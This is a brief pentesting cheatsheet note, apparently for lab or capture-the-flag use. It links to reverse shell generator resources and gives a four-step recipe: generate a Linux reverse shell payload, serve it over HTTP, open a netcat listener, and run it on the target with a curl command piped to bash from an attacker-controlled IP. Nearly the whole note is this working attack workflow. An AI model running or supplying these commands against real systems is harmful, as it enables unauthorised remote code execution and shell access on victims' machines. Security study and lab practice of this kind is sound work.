Online - Reverse Shell Generator

https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#summary

Linux multi one

https://gist.github.com/xct/ab71d58a29e9017eb38565e32aeb95b0

it generated multiple format of Linux reverse shell to try once

  1. create the file

    python3 resh.py <lhost> 4444 Fu
    
  2. create http server

    python3 -m http.server 80
    
  3. start listner

    rlwrap nc -nlvp 4444
    
  4. execute it

    curl 10.10.10.10:80/Fu | bash